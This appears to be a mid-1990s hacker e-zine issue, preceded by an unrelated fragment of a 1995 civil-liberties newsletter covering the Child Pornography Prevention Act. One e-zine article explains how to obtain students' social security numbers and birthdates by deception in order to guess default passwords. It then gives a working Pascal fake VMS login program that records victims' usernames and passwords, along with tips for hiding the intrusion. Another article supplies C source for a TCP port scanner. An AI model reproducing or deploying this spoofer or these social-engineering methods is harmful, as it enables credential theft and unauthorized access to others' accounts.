(b) Technical Amendment: The table of sections for chapter 110 of title 18, United States Code, is amended by amending the item relating to section 2252 to read as follows: `2252. Certain activities relating to material constituting or containing child pornography.'. SEC. 5. PRIVACY PROTECTION ACT AMENDMENTS. Section 101 of the Privacy Protection Act of 1980 (42 U.S.C. 2000aa) is amended-- (1) in subsection (a)(1), by inserting before the semicolon at the end the following: `, or if the offense involves the production, possession, receipt, mailing, sale, distribution, shipment, or transportation of child pornography, the sexual exploitation of children, or the sale or purchase of children under section 2251, 2251A, or 2252 of title 18, United States Code'; and (2) in subsection (b)(1), by inserting before the semicolon at the end the following: `, or if the offense involves the production, possession, receipt, mailing, sale, distribution, shipment, or transportation of child pornography, the sexual exploitation of children, or the sale or purchase of children under section 2251, 2251A, or 2252 of title 18, United States Code'. SEC. 6. SEVERABILITY. If any provision of this Act, an amendment made by this Act, or the application of such provision or amendment to any person or circumstance is held to be unconstitutional, the remainder of this Act, the amendments made by this Act, and the application of such to any other person or circumstance shall not be affected thereby. STATEMENTS OF INTRODUCED BILLS AND JOINT RESOLUTIONS (Senate - September 13, 1995) THE CHILD PORNOGRAPHY PREVENTION ACT OF 1995 Mr. HATCH. Mr. President, it is impossible for any decent American not to be outraged by child pornography and the sexual exploitation of children. Such material is a plague upon our people and the moral fabric of this great Nation. And, as a great Nation, I believe that we have both the constitutional right and moral obligation to protect our children from those who, motivated by profit or perversion or both, would abuse, exploit, and degrade the weakest and most vulnerable members of our society. Current Federal law dealing with child pornography reflects the overwhelming bipartisan consensus which has always existed, both in Congress and in the country, that there is no place for such filth even in a free society and that those who produce or peddle this reprehensible material must be made to feel the full weight of the law and suffer a punishment reflective of the seriousness of their offense. As with many of our criminal statutes, however, effective enforcement of our laws against child pornography today faces a new obstacle: The criminal use, or misuse, of new technology which is outside the scope of existing statutes. In order to close this computer-generated loophole and to give our law enforcement authorities the tools they need to stem the increasing flow of high-tech child pornography, I am today introducing the Child Pornography Prevention Act of 1995. The necessity for prompt legislative action amending our existing Federal child pornography statutes to cover the use of computer technology in the production of such material was vividly illustrated by a recent story in the Washington Times. This story, dated July 23, 1995, reported the conviction in Canada of a child pornographer who copied innocuous pictures of children from books and catalogs onto a computer, altered the images to remove the childrens' clothing, and then arranged the children into sexual positions. According to Canadian police, these sexual scenes involved not only adults and children, but also animals. Even more shocking than the occurrence of this type of repulsive conduct is the fact that, under current Federal law, those pictures, depicting naked children involved in sex with other children, adults, and even animals, would not be prosecutable as child pornography. That is because current Federal child pornography and sexual exploitation of children laws, United States Code title 18, sections 2251, 2251A, and 2252, cover only visual depictions of children engaging in sexually explicit conduct whose production involved the use of a minor engaging in such conduct; materials such as photographs, films, and videotapes. Today, however, visual depictions of children engaging in any imaginable forms of sexual conduct can be produced entirely by computer, without using children, thereby placing such depictions outside the scope of Federal law. Computers can also be used to alter sexually explicit photographs, films, and videos in such a way as to make it virtually impossible for prosecutors to identify individuals, or to prove that the offending material was produced using children. The problem is simple: While Federal law has failed to keep pace with technology, the purveyors of child pornography have been right on line with it. This bill will help to correct that problem. The Child Pornography Prevention Act of 1995, which includes a statement of congressional findings as to harm, both to children and adults, resulting from child pornography, has three major provisions. First, it would amend United States Code title 18, section 2256, to establish, for the first time, a specific, comprehensive, Federal statutory definition of child pornography. Under this bill, any visual depiction, such as a photograph, film, videotape or computer image, which is produced by any means, including electronically by computer, of sexually explicit conduct will be classified as child pornography if: (a) its production involved the use of a minor engaging in sexually explicit conduct; or (b) it depicts, or appears to depict, a minor engaging in sexually explicit conduct; or (c) it is promoted or advertised as depicting a minor engaging in sexually explicit conduct. _________________________________________________________________ __________ SUBSCRIPTION AND REPRODUCTION INFORMATION *** Know of someone ANYWHERE with a fax machine but without net *** *** access that's interested in VTW's issues? Tell them to *** *** call and get on our weekly fax distribution list at *** *** (718) 596-2851 (or email us their fax number). *** To get on the distribution list for BillWatch, send mail to listproc@vtw.org with "subscribe vtw-announce Firstname Lastname" in the subject line. To unsubscribe from BillWatch (and all other VTW publications) send mail to listproc@vtw.org with "unsubscribe vtw-announce" in the subject line. Email vtw@vtw.org with "send billwatch" in the SUBJECT LINE to receive the latest version of BillWatch For permission to reproduce VTW alerts contact vtw@vtw.org _________________________________________________________________ __________ End VTW BillWatch Issue #18, Date: Sun Sep 17 16:36:37 EDT 1995 _________________________________________________________________ __________ This file provided by: Voters Telecommunications Watch *** Watching out for your civil liberties *** Email: vtw@vtw.org (preferred) Gopher: gopher -p1/vtw gopher.panix.com URL: http://www.vtw.org/ Telephone: (718) 596-2851 (last resort) ================================================================= ========== * * * * * * * * * * * * * * * * * * * * -= H A C K E R S =- Issue #3, File #7 of 9 A VMS Login Spoof By: Talonphish ----------------------------------------------------------------- ------------ When I read last months issue of HACKERS, I was excited to see the article about VAX hacking. One thing I noticed was that to use most, if not all of the things spoken about in the article, you had to already have a privileged account. This left open one question, Just how does one go about getting a privileged account on a VAX system? That is where this article picks up. It has been said that to completly secure a system you would need to shut it down and lock it up. In other words, not let anyone use it or even get near it. It has also been said that the weakest link in a secure system is the system users. This even holds true for VAX, which is almost considered a swear word by many because it is supposedly "unhackable". Not the case. GETTING AN ACCOUNT. ------------------------- The first thing a person needs to do in order to do anything with a VAX is obviously to get an account. It doesn't have to be a privileged account, any account will do. The best way to do this would be to perform a little Social Engineering. Shoulder surfing should do the trick. If that is impossible, then just do something similar to what I did. At a certain college running VAX, all freshman students passwords were their birthdate in the form 041975, until they changed them. All usernames for students were their first initial, last 6 digits of their social security number, and their last initial. Most freshman students are somewhat computer illiterate, and never change their passwords. Therefore, all you needed to do to get an account, was to look at their drivers licence, or conduct a little survey (not in the computer lab) asking students questions about major etc.. and just dropping in a question of their soc. number and birthday.. The moral? Often a person doesnt need to look to holes, or other stupid bugs posted on the net that anyone can abuse, but to yourself and your own imagination to gain needed information. ONCE YOU HAVE AN ACCOUNT. ---------------------------- Once you have an account, be it yours or someone elses, you want to gain priviliges or at least an account that isn't yours to use. Assuming that your account is just a basic user account with no special priv's, you need to devise a plan to get a different account. Now you need to do a little research. Where do people with priviliged accounts log in from? ie.. Professors. Once you know this, you can steal their accounts fairly easily with a little program. All you need to know is what the login screens look like. Here is a VERY simple pascal program that will write the username and password to a file called outfile. !!!WARNING!!! This is not an amazing program, if you are going to use it, don't use it from your account! You should also add lines to the file login.com that will log out the account should anyone break out of the program and type things such as directory, show users, or anything else normally typed. You don't want people to know which account you are on. I also changed the prompt so it said "ERROR, TURN OFF TERMINAL AND REEBOOT" You can do this by typing Set prompt:== "whatever" from the $ prompt. begin program ----------------------------------------------------------------- ----------- program snag(input,output,outfile); type str20= varying[20] of char; var outfile:file; I:integer; cvax,username,password:str20; begin rewrite outfile; write('Local> '); readln(cvax); {this simulates the login screen} writeln('Local -010- session 1 to VAX on node OMEGA established'); writeln('Somewhere University of XX'); writeln('Computing and Communications Center'); writeln('Unauthorized Access Prohibited'); {ain't it the truth} write('Username: '); readln(username); write('Password: '); readln(password); write(outfile,username); write(outfile,password); writeln('ERROR x99503b, Please turn off terminal and reeboot'); close outfile; for I=1 to 100 do readln; {prevents person from hitting keys and going back to shell} end. -------------------------------------------------------------- end program.. Run in the right place at the right time and viola, priviliged access. Then use the things you learned in issue #2 of HACKERS and hack away. *note* This program did not turn off echo from keyboard to screen for the input of password, this could be a dead giveaway. I suggest rewriting the code(in a better language). This is only an example. In closing, No system will ever be secure and useful at the same time. Talonphish * * * * * * * * * * * * * * * * * * * * -= H A C K E R S =- Issue #3, File #8 of 9 Remote Host Probing By: IOERROR The enclosed program, 100% my own code, will probe port 1-1024 on the given host (call it as: % tcpprobe connected.com) and report on which hosts accept connections. It may require a little tweaking to work on some of the oddball Unixes like SunOS... I wrote it under Linux. -----BEGIN-----cut here----- /* -*-C-*- tcpprobe.c */ /* tcpprobe - report on which tcp ports accept connections */ /* IO ERROR, error@axs.net, Sep 15, 1995 */ #include #include #include #include #include #include int main(int argc, char **argv) { int probeport = 0; struct hostent *host; int err, i, net; struct sockaddr_in sa; if (argc != 2) { printf("Usage: %s hostname\n", argv[0]); exit(1); } for (i = 1; i < 1024; i++) { strncpy((char *)&sa, "", sizeof sa); sa.sin_family = AF_INET; if (isdigit(*argv[1])) sa.sin_addr.s_addr = inet_addr(argv[1]); else if ((host = gethostbyname(argv[1])) != 0) strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr); else { herror(argv[1]); exit(2); } sa.sin_port = htons(i); net = socket(AF_INET, SOCK_STREAM, 0); if (net < 0) { perror("\nsocket"); exit(2); } err = connect(net, (struct sockaddr *) &sa, sizeof sa); if (err < 0) { printf("%s %-5d %s\r", argv[1], i, strerror(errno)); fflush(stdout); } else { printf("%s %-5d accepted. \n", argv[1], i); if (shutdown(net, 2) < 0) { perror("\nshutdown"); exit(2); } } close(net); } printf(" \r"); fflush(stdout); return (0); } * * * * * * * * * * * * * * * * * * * * -= H A C K E R S =- Issue #3, File #9 of 9 The End As I said in the intro, I've moved, so from now on direct all snail mail to Room #621A, Redwood Hall, 186 Bleeker St., Newark, NJ 07103. My new phone number is (201) 565-9145, and if you live in NYC, I'll see you at 2600, hopefully. As always, if you've got an article or two, send them over to scanlonr@delphi.com. We still have not had enough reader response, good or bad, to justify a letters column, so if you have anything to say about the mag, or have any questions about Hacking as a whole, send them on in. So until next month, where ever you hack, may the ethic be with you.... * * * * * * * * * * * * * * * * * * * *